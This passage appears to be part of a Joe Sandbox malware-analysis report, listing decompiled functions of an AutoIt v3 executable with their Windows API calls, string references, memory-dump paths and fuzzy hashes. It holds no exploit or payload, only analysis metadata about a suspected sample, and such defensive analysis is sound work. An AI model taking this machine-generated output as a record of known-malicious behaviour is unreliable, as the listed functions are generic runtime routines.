GetSystemMetrics.USER32(00000007), ref: 0042A841
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0042A86C
GetSystemMetrics.USER32(00000008), ref: 0042A874
GetSystemMetrics.USER32(00000004), ref: 0042A899
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0042A8B6
AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0042A8C6
CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0042A8F9
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0042A90D
GetClientRect.USER32(00000000,000000FF), ref: 0042A92B
GetStockObject.GDI32(00000011), ref: 0042A947
SendMessageW.USER32(00000000,00000030,00000000), ref: 0042A952

Part of subcall function 0042B736: GetCursorPos.USER32(000000FF), ref: 0042B749
Part of subcall function 0042B736: ScreenToClient.USER32(00000000,000000FF), ref: 0042B766
Part of subcall function 0042B736: GetAsyncKeyState.USER32(00000001), ref: 0042B78B
Part of subcall function 0042B736: GetAsyncKeyState.USER32(00000002), ref: 0042B799

SetTimer.USER32(00000000,00000000,00000028,0042ACEE), ref: 0042A979

Strings

AutoIt v3 GUI, xrefs: 0042A8F1

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 58db8265f932ff959097dcaf3214dce0fe50a3cd78576935c62c9b3b0f0eaf8b
Instruction ID: c3937bf2f67b51352af64dc4b42c80416bf4b4639878f110ce98da4e632cdbdd
Opcode Fuzzy Hash: 58db8265f932ff959097dcaf3214dce0fe50a3cd78576935c62c9b3b0f0eaf8b
Instruction Fuzzy Hash: C2B19F71A0021AEFDB10EFA9DC45BAE7BB4FB08314F11452BFA15A72A0C778D851CB59

Function 004769C5 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00476A52
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00476B12

Strings

GETSELECTEDCOUNT, xrefs: 00476AF5
GETITEMCOUNT, xrefs: 00476A80
VIEWCHANGE, xrefs: 00476CC9
GETSELECTED, xrefs: 00476C38
SELECTINVERT, xrefs: 00476BDA
SELECT, xrefs: 00476BA4
GETSUBITEMCOUNT, xrefs: 00476A9D
DESELECT, xrefs: 00476BF8
SELECTCLEAR, xrefs: 00476B89
FINDITEM, xrefs: 00476C7D
ISSELECTED, xrefs: 00476B1D
GETTEXT, xrefs: 00476ABB
SELECTALL, xrefs: 00476B71

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: df163a384d362e7f2aed31be46c878eb9a208ad6ae2792e1cba835ce6e6b165e
Instruction ID: e6bd23daa2135bf6dc4a3ece1649b1e85135321994c0db1f302eca0b990ceddb
Opcode Fuzzy Hash: df163a384d362e7f2aed31be46c878eb9a208ad6ae2792e1cba835ce6e6b165e
Instruction Fuzzy Hash: EBA1B8302046119FC704EF15C951BAAB3A6EF85358F55C86FB89A5B392DB38EC09CB4D

Function 0044DD46 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0044DD87
__swprintf.LIBCMT ref: 0044DE28
_wcscmp.LIBCMT ref: 0044DE3B
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0044DE90
_wcscmp.LIBCMT ref: 0044DECC
GetClassNameW.USER32(?,?,00000400), ref: 0044DF03
GetDlgCtrlID.USER32(?), ref: 0044DF55
GetWindowRect.USER32(?,?), ref: 0044DF8B
GetParent.USER32(?), ref: 0044DFA9
ScreenToClient.USER32(00000000), ref: 0044DFB0
GetClassNameW.USER32(?,?,00000100), ref: 0044E02A
_wcscmp.LIBCMT ref: 0044E03E
GetWindowTextW.USER32(?,?,00000400), ref: 0044E064
_wcscmp.LIBCMT ref: 0044E078

Strings

%s%u, xrefs: 0044DE22

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
String ID: %s%u
API String ID: 3119225716-679674701
Opcode ID: d52dca5f5140e7ff7833e044cc6528aacfcd26ffdab5490f9d56229ed7a17a4d
Instruction ID: e03a1c22c87b3ba9f6bcdd6fc4c7a272c71da94db9b453710cc8c85bee2be0c1
Opcode Fuzzy Hash: d52dca5f5140e7ff7833e044cc6528aacfcd26ffdab5490f9d56229ed7a17a4d
Instruction Fuzzy Hash: 40A1E131604716AFE714DF61C884BABB7A8FF54304F00852BF9A9C2291DB78E945CB99

Function 0044E69D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0044E6E1
_wcscmp.LIBCMT ref: 0044E6F2
GetWindowTextW.USER32(00000001,?,00000400), ref: 0044E71A
CharUpperBuffW.USER32(?,00000000), ref: 0044E737
_wcscmp.LIBCMT ref: 0044E755
_wcsstr.LIBCMT ref: 0044E766
GetClassNameW.USER32(00000018,?,00000400), ref: 0044E79E
_wcscmp.LIBCMT ref: 0044E7AE
GetWindowTextW.USER32(00000002,?,00000400), ref: 0044E7D5
GetClassNameW.USER32(00000018,?,00000400), ref: 0044E81E
_wcscmp.LIBCMT ref: 0044E82E
GetClassNameW.USER32(00000010,?,00000400), ref: 0044E856
GetWindowRect.USER32(00000004,?), ref: 0044E8BF

Strings

@, xrefs: 0044E6BC
ThumbnailClass, xrefs: 0044E7A9, 0044E829

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 375481167ed1d49be920c07105eff7baddb4af00ffa0a5ba38da976c2e3276bf
Instruction ID: 910d9d7cce98f86681d4c38dd2db54993ac0b97fba8268bb13af23d37b0a407c
Opcode Fuzzy Hash: 375481167ed1d49be920c07105eff7baddb4af00ffa0a5ba38da976c2e3276bf
Instruction Fuzzy Hash: E98191710042059BEB05DF12C981FAB77E8FF54318F04846BFD859A196DB38DD46CBA9

Function 0044E4EA Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0044E549

Strings

LAST, xrefs: 0044E50E
[LAST, xrefs: 0044E5F6
CLASSNAME=, xrefs: 0044E586
HANDLE=, xrefs: 0044E542
[ACTIVE, xrefs: 0044E536
[ALL, xrefs: 0044E5EF
[REGEXPTITLE:, xrefs: 0044E571
[HANDLE:, xrefs: 0044E555
ACTIVE, xrefs: 0044E524
REGEXP=, xrefs: 0044E55E
[CLASS:, xrefs: 0044E599
ALL, xrefs: 0044E5DD

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: a9833646be831e68ff235a1cb46d86b143406bd57099bcfa90d0a154346efe10
Instruction ID: 899732c89d35cc439201da557f150923c7ab66ed6b905c1690f9df7b4abdd1d1
Opcode Fuzzy Hash: a9833646be831e68ff235a1cb46d86b143406bd57099bcfa90d0a154346efe10
Instruction Fuzzy Hash: 01318D35944205A6EB54EA92CE43FEE73A46B24708F30042FB551B10E5FFED6F44865E

Function 0044F898 Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 0044F8AB
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0044F8BD
SetWindowTextW.USER32(?,?), ref: 0044F8D4
GetDlgItem.USER32(?,000003EA), ref: 0044F8E9
SetWindowTextW.USER32(00000000,?), ref: 0044F8EF
GetDlgItem.USER32(?,000003E9), ref: 0044F8FF
SetWindowTextW.USER32(00000000,?), ref: 0044F905
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0044F926
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0044F940
GetWindowRect.USER32(?,?), ref: 0044F949
SetWindowTextW.USER32(?,?), ref: 0044F9B4
GetDesktopWindow.USER32 ref: 0044F9BA
GetWindowRect.USER32(00000000), ref: 0044F9C1
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0044FA0D
GetClientRect.USER32(?,?), ref: 0044FA1A
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0044FA3F
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0044FA6A

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: fe8d7a3b7f191c14d03d15bb54dd41efd574d79c7d9434f632ec54396bcfab01
Instruction ID: acb51820162ad70188eb79b6988e3a6d0c55dbc1c8ad4fad2b618cc8ff6a76ad
Opcode Fuzzy Hash: fe8d7a3b7f191c14d03d15bb54dd41efd574d79c7d9434f632ec54396bcfab01
Instruction Fuzzy Hash: F9514F71900709AFEB209FA8CD85F6FBBF5FF04704F00453AE596A66A0C774A948CB14

Function 004601E4 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 237COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 0046026A
_wcschr.LIBCMT ref: 00460278
_wcscpy.LIBCMT ref: 0046028F
_wcscat.LIBCMT ref: 0046029E
_wcscat.LIBCMT ref: 004602BC
_wcscpy.LIBCMT ref: 004602DD
__wsplitpath.LIBCMT ref: 004603BA
_wcscpy.LIBCMT ref: 004603DF
_wcscpy.LIBCMT ref: 004603F1
_wcscpy.LIBCMT ref: 00460406
_wcscat.LIBCMT ref: 0046041B
_wcscat.LIBCMT ref: 0046042D
_wcscat.LIBCMT ref: 00460442

Part of subcall function 0045C890: _wcscmp.LIBCMT ref: 0045C92A
Part of subcall function 0045C890: __wsplitpath.LIBCMT ref: 0045C96F
Part of subcall function 0045C890: _wcscpy.LIBCMT ref: 0045C982
Part of subcall function 0045C890: _wcscat.LIBCMT ref: 0045C995
Part of subcall function 0045C890: __wsplitpath.LIBCMT ref: 0045C9BA
Part of subcall function 0045C890: _wcscat.LIBCMT ref: 0045C9D0
Part of subcall function 0045C890: _wcscat.LIBCMT ref: 0045C9E3

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00460235

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 2955681530-2806939583
Opcode ID: 07d14b8eee008667582b2d3eb5b64427af04725ffad1ada87804d4559f481b3a
Instruction ID: d502a12d613c7c40ae68f08c2768299e00d33ee3544b568e7403857b678de5b0
Opcode Fuzzy Hash: 07d14b8eee008667582b2d3eb5b64427af04725ffad1ada87804d4559f481b3a
Instruction Fuzzy Hash: 10919271504705AFCB20EF51C955F9BB3E8AF88318F00485FF94997261EB38EA84CB5A

Function 0047CC68 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0047CD0B
DestroyWindow.USER32(00000000,?), ref: 0047CD83

Part of subcall function 00417E53: _memmove.LIBCMT ref: 00417EB9

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0047CE04
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0047CE26
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0047CE35
DestroyWindow.USER32(?), ref: 0047CE52
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00410000,00000000), ref: 0047CE85
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0047CEA4
GetDesktopWindow.USER32 ref: 0047CEB9
GetWindowRect.USER32(00000000), ref: 0047CEC0
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0047CED2
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0047CEEA

Part of subcall function 0042B155: GetWindowLongW.USER32(?,000000EB), ref: 0042B166

Strings

0, xrefs: 0047CD2B
tooltips_class32, xrefs: 0047CDFD, 0047CE7E

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 16d2c06dce7c260a8279c3b235b15ee434ab8c0f593dd733e89e88ff2a75431b
Instruction ID: 3f36eb35474d04907f1b6b3b84b5f6b30431716bd5e7a25bf2d0d2b20e6f928d
Opcode Fuzzy Hash: 16d2c06dce7c260a8279c3b235b15ee434ab8c0f593dd733e89e88ff2a75431b
Instruction Fuzzy Hash: F3719A71140309AFE724DF28CC85FAB3BE5EB88704F54452EF989972A1D778E901DB29

Function 0045B428 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 350timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 0045B46D
VariantCopy.OLEAUT32(?,?), ref: 0045B476
VariantClear.OLEAUT32(?), ref: 0045B482
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0045B561
__swprintf.LIBCMT ref: 0045B591
VarR8FromDec.OLEAUT32(?,?), ref: 0045B5BD
VariantInit.OLEAUT32(?), ref: 0045B63F
SysFreeString.OLEAUT32(00000016), ref: 0045B6D1
VariantClear.OLEAUT32(?), ref: 0045B727
VariantClear.OLEAUT32(?), ref: 0045B736
VariantInit.OLEAUT32(00000000), ref: 0045B772

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 0045B58B
Default, xrefs: 0045B615

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: 923de90585afedcc769e92e1bcd22d7283f49cb5c9c5a74b14b6235c42bcdb84
Instruction ID: cf043143cdd0723a081ff402b8a02a094cb43e606bef92d7f7b697f1aa819eb4
Opcode Fuzzy Hash: 923de90585afedcc769e92e1bcd22d7283f49cb5c9c5a74b14b6235c42bcdb84
Instruction Fuzzy Hash: 1AC1E571900615EBCB20DF66D88476AB7B4FF06702F14846BE8059B243D778DC49DBDA

Function 00476F67 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00476FF9
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00477044

Strings

SELECT, xrefs: 004771DD
CHECK, xrefs: 00477064
COLLAPSE, xrefs: 0047708A
GETTOTALCOUNT, xrefs: 00477027
GETITEMCOUNT, xrefs: 0047710E
EXPAND, xrefs: 004770DE
GETTEXT, xrefs: 0047717F
ISCHECKED, xrefs: 004771AF
UNCHECK, xrefs: 00477208
GETSELECTED, xrefs: 0047713C
EXISTS, xrefs: 004770AD

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: e3b2cb5d53908f57ae64a2f26b5ffd66fa01b1845028c955a5c3d15c6eb04ab5
Instruction ID: c534340a23a6c165ab9ca047ed53279b073cd64c73fb8fd476196d88d0ba9df2
Opcode Fuzzy Hash: e3b2cb5d53908f57ae64a2f26b5ffd66fa01b1845028c955a5c3d15c6eb04ab5
Instruction Fuzzy Hash: 7291A9342043019FC714EF15C851AAAB7E2AF94354F84886FF85A5B393DB39ED4AC749

Function 0047E305 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0047E3BB
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0047BCBF), ref: 0047E417
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0047E457
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0047E49C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0047E4D3
FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0047BCBF), ref: 0047E4DF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0047E4EF
DestroyCursor.USER32(?), ref: 0047E4FE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0047E51B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0047E527

Part of subcall function 00431BC7: __wcsicmp_l.LIBCMT ref: 00431C50

Strings

.exe, xrefs: 0047E351
.icl, xrefs: 0047E331
.dll, xrefs: 0047E374

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 3907162815-1154884017
Opcode ID: 915fce09205af9e86c03e4f95d36438e7bb0905f62fac9922fae148a4785fc73
Instruction ID: 910e58d7f0452964815add7d59ab2b29c69c8e9773fd353c26371bfbd4a3c186
Opcode Fuzzy Hash: 915fce09205af9e86c03e4f95d36438e7bb0905f62fac9922fae148a4785fc73
Instruction Fuzzy Hash: B561AF71900215BAEB14DF66DC45FEA77A8AB08714F10825AF919E71D0EB78AD80C7A8

Function 00460E41 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 184timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00460EFF
SystemTimeToFileTime.KERNEL32(?,?), ref: 00460F0F
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00460F1B
__wsplitpath.LIBCMT ref: 00460F79
_wcscat.LIBCMT ref: 00460F91
_wcscat.LIBCMT ref: 00460FA3
GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00460FB8
SetCurrentDirectoryW.KERNEL32(?), ref: 00460FCC
SetCurrentDirectoryW.KERNEL32(?), ref: 00460FFE
SetCurrentDirectoryW.KERNEL32(?), ref: 0046101F
_wcscpy.LIBCMT ref: 0046102B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0046106A

Strings

*.*, xrefs: 00461025

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
